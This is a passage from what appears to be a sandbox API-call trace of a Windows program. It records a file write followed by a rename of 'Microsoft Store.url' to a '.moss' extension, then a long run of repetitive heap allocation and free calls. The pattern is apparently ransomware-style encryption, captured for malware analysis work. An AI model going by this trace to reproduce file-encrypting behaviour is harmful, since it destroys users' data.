hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.398] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.398] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.398] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.398] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.398] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.399] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.399] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.399] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.399] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.moss")) returned 1 [0171.400] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.400] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.400] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.402] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.402] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0171.402] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.402] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.402] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0171.402] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.403] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.404] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.408] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, 